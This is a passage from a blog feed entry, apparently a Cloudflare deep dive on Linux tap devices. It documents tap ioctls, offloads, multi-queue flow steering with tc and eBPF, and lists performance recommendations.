    <table><colgroup><col></col><col></col></colgroup><tbody><tr><td><p><span>TUNGETFEATURES</span></p></td><td><p><span>Return vector of IFF_* constants that the kernel supports. Typically used to detect the host support of: IFF_VNET_HDR, IFF_NAPI and IFF_MULTI_QUEUE.</span></p></td></tr><tr><td><p><span>TUNSETIFF</span></p></td><td><p><span>Takes "struct ifreq", sets up a tap device, fills in the name if empty.</span></p></td></tr><tr><td><p><span>TUNGETIFF</span></p></td><td><p><span>Returns a "struct ifreq" containing the device's current name and flags.</span></p></td></tr><tr><td><p><span>TUNSETPERSIST</span></p></td><td><p><span>Sets TUN_PERSIST flag, if you want the device to remain in the system after the tap_fd is closed.</span></p></td></tr><tr><td><p><span>TUNSETOWNER, TUNSETGROUP</span></p></td><td><p><span>Set uid and gid that can own the device.</span></p></td></tr><tr><td><p><span>TUNSETLINK</span></p></td><td><p><span>Set the Ethernet link type for the device. The device must be down. See ARPHRD_* constants. For tap it defaults to ARPHRD_ETHER.</span></p></td></tr><tr><td><p><span>TUNSETOFFLOAD</span></p></td><td><p><span>As documented above.</span></p></td></tr><tr><td><p><span>TUNGETSNDBUF, TUNSETSNDBUF</span></p></td><td><p><span>Get/set send buffer. The default is INT_MAX.</span></p></td></tr><tr><td><p><span>TUNGETVNETHDRSZ, TUNSETVNETHDRSZ</span></p></td><td><p><span>Already discussed.</span></p></td></tr><tr><td><p><span>TUNSETIFINDEX</span></p></td><td><p><span>Set interface index (ifindex), </span><a href="https://patchwork.ozlabs.org/project/netdev/patch/51B99946.3000703@parallels.com/"><span>useful in checkpoint-restore</span></a><span>.</span></p></td></tr><tr><td><p><span>TUNSETCARRIER</span></p></td><td><p><span>Set the carrier state of an interface, as discussed earlier, useful with IFF_NO_CARRIER.</span></p></td></tr><tr><td><p><span>TUNGETDEVNETNS</span></p></td><td><p><span>Return an fd of a net namespace that the interface belongs to.</span></p></td></tr></tbody></table>
    <div>
      <h5>Filtering related socket options</h5>
      <a href="#filtering-related-socket-options">
        
      </a>
    </div>
    <table><colgroup><col></col><col></col></colgroup><tbody><tr><td><p><span>TUNSETTXFILTER</span></p></td><td><p><span>Takes "struct tun_filter" which limits the dst mac addresses that can be delivered to the application.</span></p></td></tr><tr><td><p><span>TUNATTACHFILTER, TUNDETACHFILTER, TUNGETFILTER</span></p></td><td><p><span>Attach/detach/get classic BPF filter for packets going to application. Takes "struct sock_fprog".</span></p><br /></td></tr><tr><td><p><span>TUNSETFILTEREBPF</span></p></td><td><p><span>Set an eBPF filter on a tap device. This is independent of the classic BPF above.</span></p></td></tr></tbody></table>
    <div>
      <h4>Multi queue related socket options</h4>
      <a href="#multi-queue-related-socket-options">
        
      </a>
    </div>
    <table><colgroup><col></col><col></col></colgroup><tbody><tr><td><p><span>TUNSETQUEUE</span></p></td><td><p><span>Used to set IFF_DETACH_QUEUE and IFF_ATTACH_QUEUE for multiqueue.</span></p></td></tr><tr><td><p><span>TUNSETSTEERINGEBPF</span></p></td><td><p><span>Set an eBPF program for selecting a specific tap queue, in the direction towards the application. This is useful if you want to ensure some traffic is sticky to a specific application thread. The eBPF program takes "struct __sk_buff" and returns an int. The result queue number is computed from the return value u16 modulo number of queues is the selection.</span></p></td></tr></tbody></table>
    <div>
      <h2>Single queue speed</h2>
      <a href="#single-queue-speed">
        
      </a>
    </div>
    <p>Tap devices are quite weird — they aren't network sockets, nor true files. Their semantics are closest to pipes, and unfortunately the API reflects that. To receive or send a packet from a tap device, the application must do a read() or write() syscall, one packet at a time.</p><p>One might think that some sort of syscall batching would help. Sockets have sendmmsg()/recvmmsg(), but that doesn't work on tap file descriptors. The typical alternatives enabling batching are: an old <a href="/io_submit-the-epoll-alternative-youve-never-heard-about/">io_submit AIO interface</a>, or modern io_uring. Io_uring added tap support quite recently. However, it turns out syscall batching doesn't really offer that much of an improvement. Maybe in the range of 10%.</p><p>The Linux kernel is just not capable of forwarding millions of packets per second for a single flow or on a single CPU. The best possible solution is to scale vertically for elephant flows with TSO/USO (packet trains) offloads, and scale horizontally for multiple concurrent flows with multi queue.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/7Mfbelr6xUN4bGLTPAFLHr/945a18d93d8bce312e7205bdb5911b16/image5-1.png" />
            
            </figure><p>In this chart you can see how dramatic the performance gain of offloads is. Without them, a sample "echo" tap application can process between 320 and 500 thousand packets per second on a single core. MTU being 1500. When the offloads are enabled it jumps to 2.7Mpps, while keeping the number of received "packet trains" to just 56 thousand per second. Of course not every traffic pattern can fully utilize GRO/GSO. However, to get decent performance from tap, and from Linux in general, offloads are absolutely critical.</p>
    <div>
      <h2>Multi queue considerations</h2>
      <a href="#multi-queue-considerations">
        
      </a>
    </div>
    <p>Multi queue is useful when the tap application is handling multiple concurrent flows and needs to utilize more than one CPU.</p><p>To get a file descriptor of a tap queue, just add the IFF_MULTI_QUEUE flag when opening the tap. It's possible to detach/reattach a queue with TUNSETQUEUE and IFF_DETACH_QUEUE/IFF_ATTACH_QUEUE, but I'm unsure when this is useful.</p><p>When a multi queue tap is created, it spreads the load across multiple tap queues, each one having a unique file descriptor. Beware of the algorithm selecting the queue though: it might bite you back.</p><p>By default, Linux tap driver records a symmetric flow hash of any handled flow in a flow table. It saves on which queue the traffic from the application was transmitted. Then, on the receiving side it follows that selection and sends subsequent packets to that specific queue. For example, if your userspace application is sending some TCP flow over queue #2, then the packets going into the application which are a part of that flow will go to queue #2. This is generally a sensible design as long as the sender is always selecting one specific queue. If the sender changes the TX queue, new packets will immediately shift and packets within one flow might be seen as reordered. Additionally, this queue selection design does not take into account CPU locality and might have minor negative effects on performance for very high throughput applications.</p><p>It's possible to override the flow hash based queue selection by using <a href="https://www.infradead.org/~mchehab/kernel_docs/networking/multiqueue.html">tc multiq qdisc and skbedit queue_mapping filter</a>:</p>
            <pre><code>tc qdisc add dev tap0 root handle 1: multiq
tc filter add dev tap0 parent 1: protocol ip prio 1 u32 \
        match ip dst 192.168.0.3 \
        action skbedit queue_mapping 0</code></pre>
            <p><b>tc</b> is fragile and thus it's not a solution I would recommend. A better way is to customize the queue selection algorithm with a TUNSETSTEERINGEBPF eBPF program. In that case, the flow tracking code is not employed anymore. By smartly using such a steering eBPF program, it's possible to keep the flow processing local to one CPU — useful for best performance.</p>
    <div>
      <h2>Summary</h2>
      <a href="#summary">
        
      </a>
    </div>
    <p>Now you know everything I wish I had known when I was setting out on this journey!</p><p>To get the best performance, I recommend:</p><ul><li><p>enable vnethdr</p></li><li><p>enable offloads (TSO and USO)</p></li><li><p>consider spreading the load across multiple queues and CPUs with multi queue</p></li><li><p>consider syscall batching for additional gain of maybe 10%, perhaps try io_uring</p></li><li><p>consider customizing the steering algorithm</p></li></ul><p>References:</p><ul><li><p><a href="https://www.linux-kvm.org/images/6/63/2012-forum-multiqueue-networking-for-kvm.pdf">https://www.linux-kvm.org/images/6/63/2012-forum-multiqueue-networking-for-kvm.pdf</a></p></li><li><p><a href="https://backreference.org/2010/03/26/tuntap-interface-tutorial/">https://backreference.org/2010/03/26/tuntap-interface-tutorial/</a></p></li><li><p><a href="https://ldpreload.com/p/tuntap-notes.txt">https://ldpreload.com/p/tuntap-notes.txt</a></p></li><li><p><a href="https://www.kernel.org/doc/Documentation/networking/tuntap.txt">https://www.kernel.org/doc/Documentation/networking/tuntap.txt</a></p></li><li><p><a href="https://tailscale.com/blog/more-throughput/">https://tailscale.com/blog/more-throughput/</a></p></li></ul> ]]></content:encoded>
            <category><![CDATA[Deep Dive]]></category>
            <guid isPermaLink="false">7Fur1bA5gwvHjrVPMLYx9E</guid>
            <dc:creator>Marek Majkowski</dc:creator>
        </item>
    </channel>
</rss>